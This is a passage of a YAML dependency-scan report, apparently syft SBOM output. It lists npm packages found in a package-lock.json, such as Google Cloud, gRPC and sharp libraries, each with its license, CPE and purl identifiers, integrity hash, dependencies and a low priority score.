cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 98e9db7b5ca2c98a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @firebase/util 1.10.0'
|
|
title: '@firebase/util 1.10.0'
|
|
description: 'Package discovered: @firebase/util 1.10.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 6fc2f98e01b8bb45
|
|
name: '@firebase/util'
|
|
version: 1.10.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:google:firebase\/util:1.10.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/%40firebase/util@1.10.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@firebase/util/-/util-1.10.0.tgz
|
|
integrity: sha512-xKtx4A668icQqoANRxyDLBLz51TAbDP9KRfpbKGxiCAW346d0BeJe5vN6/hKxxmWwnZ0mautyv39JxviwwQMOQ==
|
|
dependencies:
|
|
tslib: ^2.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ac959c0aec00c93e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @google-cloud/firestore 7.11.6'
|
|
title: '@google-cloud/firestore 7.11.6'
|
|
description: 'Package discovered: @google-cloud/firestore 7.11.6'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 352073d173d9984f
|
|
name: '@google-cloud/firestore'
|
|
version: 7.11.6
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:google:cloud_firestore:7.11.6:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/%40google-cloud/firestore@7.11.6
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@google-cloud/firestore/-/firestore-7.11.6.tgz
|
|
integrity: sha512-EW/O8ktzwLfyWBOsNuhRoMi8lrC3clHM5LVFhGvO1HCsLozCOOXRAlHrYBoE6HL42Sc8yYMuCb2XqcnJ4OOEpw==
|
|
dependencies:
|
|
'@opentelemetry/api': ^1.3.0
|
|
fast-deep-equal: ^3.1.1
|
|
functional-red-black-tree: ^1.0.1
|
|
google-gax: ^4.3.3
|
|
protobufjs: ^7.2.6
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f729f15026a15114
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @google-cloud/paginator 5.0.2'
|
|
title: '@google-cloud/paginator 5.0.2'
|
|
description: 'Package discovered: @google-cloud/paginator 5.0.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e1f90862acd15bdd
|
|
name: '@google-cloud/paginator'
|
|
version: 5.0.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google-cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/paginator:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google-cloud\/paginator:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google_cloud\/paginator:5.0.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40google-cloud/paginator@5.0.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@google-cloud/paginator/-/paginator-5.0.2.tgz
|
|
integrity: sha512-DJS3s0OVH4zFDB1PzjxAsHqJT6sKVbRwwML0ZBP9PbU7Yebtu/7SWMRzvO2J3nUi9pRNITCfu4LJeooM2w4pjg==
|
|
dependencies:
|
|
arrify: ^2.0.0
|
|
extend: ^3.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 13de8663f3cca980
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @google-cloud/projectify 4.0.0'
|
|
title: '@google-cloud/projectify 4.0.0'
|
|
description: 'Package discovered: @google-cloud/projectify 4.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: aae37aa20c3046f6
|
|
name: '@google-cloud/projectify'
|
|
version: 4.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google-cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/projectify:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google-cloud\/projectify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google_cloud\/projectify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40google-cloud/projectify@4.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@google-cloud/projectify/-/projectify-4.0.0.tgz
|
|
integrity: sha512-MmaX6HeSvyPbWGwFq7mXdo0uQZLGBYCwziiLIGq5JVX+/bdI3SAq6bP98trV5eTWfLuvsMcIC1YJOF2vfteLFA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f473f0a74b429a34
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @google-cloud/promisify 4.0.0'
|
|
title: '@google-cloud/promisify 4.0.0'
|
|
description: 'Package discovered: @google-cloud/promisify 4.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3927becf19e34873
|
|
name: '@google-cloud/promisify'
|
|
version: 4.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google-cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/promisify:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google-cloud\/promisify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google_cloud\/promisify:4.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40google-cloud/promisify@4.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@google-cloud/promisify/-/promisify-4.0.0.tgz
|
|
integrity: sha512-Orxzlfb9c67A15cq2JQEyVc7wEsmFBmHjZWZYQMUyJ1qivXyMwdyNOs9odi79hze+2zqdTtu1E19IM/FtqZ10g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5c9bae4ce6812dd2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @google-cloud/storage 7.19.0'
|
|
title: '@google-cloud/storage 7.19.0'
|
|
description: 'Package discovered: @google-cloud/storage 7.19.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: cefeafe40657f94b
|
|
name: '@google-cloud/storage'
|
|
version: 7.19.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@google-cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google-cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/storage:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google_cloud\/storage:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google-cloud\/storage:7.19.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@google:\@google_cloud\/storage:7.19.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40google-cloud/storage@7.19.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@google-cloud/storage/-/storage-7.19.0.tgz
|
|
integrity: sha512-n2FjE7NAOYyshogdc7KQOl/VZb4sneqPjWouSyia9CMDdMhRX5+RIbqalNmC7LOLzuLAN89VlF2HvG8na9G+zQ==
|
|
dependencies:
|
|
'@google-cloud/paginator': ^5.0.0
|
|
'@google-cloud/projectify': ^4.0.0
|
|
'@google-cloud/promisify': <4.1.0
|
|
abort-controller: ^3.0.0
|
|
async-retry: ^1.3.3
|
|
duplexify: ^4.1.3
|
|
fast-xml-parser: ^5.3.4
|
|
gaxios: ^6.0.2
|
|
google-auth-library: ^9.6.3
|
|
html-entities: ^2.5.2
|
|
mime: ^3.0.0
|
|
p-limit: ^3.0.1
|
|
retry-request: ^7.0.0
|
|
teeny-request: ^9.0.0
|
|
uuid: ^8.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 596d6a964fdec768
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @grpc/grpc-js 1.14.3'
|
|
title: '@grpc/grpc-js 1.14.3'
|
|
description: 'Package discovered: @grpc/grpc-js 1.14.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3f87a56430ddd85e
|
|
name: '@grpc/grpc-js'
|
|
version: 1.14.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:grpc:grpc:1.14.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/%40grpc/grpc-js@1.14.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@grpc/grpc-js/-/grpc-js-1.14.3.tgz
|
|
integrity: sha512-Iq8QQQ/7X3Sac15oB6p0FmUg/klxQvXLeileoqrTRGJYLV+/9tubbr9ipz0GKHjmXVsgFPo/+W+2cA8eNcR+XA==
|
|
dependencies:
|
|
'@grpc/proto-loader': ^0.8.0
|
|
'@js-sdsl/ordered-map': ^4.4.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: feaff3ef7cf15262
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @grpc/proto-loader 0.7.15'
|
|
title: '@grpc/proto-loader 0.7.15'
|
|
description: 'Package discovered: @grpc/proto-loader 0.7.15'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 05aac3d8e010493a
|
|
name: '@grpc/proto-loader'
|
|
version: 0.7.15
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.7.15:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.7.15:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40grpc/proto-loader@0.7.15
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.7.15.tgz
|
|
integrity: sha512-tMXdRCfYVixjuFK+Hk0Q1s38gV9zDiDJfWL3h1rv4Qc39oILCu1TRTDt7+fGUI8K4G1Fj125Hx/ru3azECWTyQ==
|
|
dependencies:
|
|
lodash.camelcase: ^4.3.0
|
|
long: ^5.0.0
|
|
protobufjs: ^7.2.5
|
|
yargs: ^17.7.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 81837b7c5203b82b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @grpc/proto-loader 0.8.0'
|
|
title: '@grpc/proto-loader 0.8.0'
|
|
description: 'Package discovered: @grpc/proto-loader 0.8.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1a954d92edb2b14f
|
|
name: '@grpc/proto-loader'
|
|
version: 0.8.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto-loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto_loader:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto-loader:0.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@grpc\/proto:\@grpc\/proto_loader:0.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40grpc/proto-loader@0.8.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@grpc/proto-loader/-/proto-loader-0.8.0.tgz
|
|
integrity: sha512-rc1hOQtjIWGxcxpb9aHAfLpIctjEnsDehj0DAiVfBlmT84uvR0uUtN2hEi/ecvWVjXUGf5qPF4qEgiLOx1YIMQ==
|
|
dependencies:
|
|
lodash.camelcase: ^4.3.0
|
|
long: ^5.0.0
|
|
protobufjs: ^7.5.3
|
|
yargs: ^17.7.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ba1c7d59d68ea634
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/colour 1.1.0'
|
|
title: '@img/colour 1.1.0'
|
|
description: 'Package discovered: @img/colour 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0b879a880de07100
|
|
name: '@img/colour'
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/colour:\@img\/colour:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40img/colour@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@img/colour/-/colour-1.1.0.tgz
|
|
integrity: sha512-Td76q7j57o/tLVdgS746cYARfSyxk8iEfRxewL9h4OMzYhbW4TAcppl0mT4eyqXddh6L/jwoM75mo7ixa/pCeQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 69b8f19d695c4a0d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @img/sharp-darwin-arm64 0.34.5'
|
|
title: '@img/sharp-darwin-arm64 0.34.5'
|
|
description: 'Package discovered: @img/sharp-darwin-arm64 0.34.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 535aeb1bbda7aba8
|
|
name: '@img/sharp-darwin-arm64'
|
|
version: 0.34.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin-arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp_darwin_arm64:\@img\/sharp_darwin_arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@img\/sharp-darwin:\@img\/sharp-darwin-arm64:0.34.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
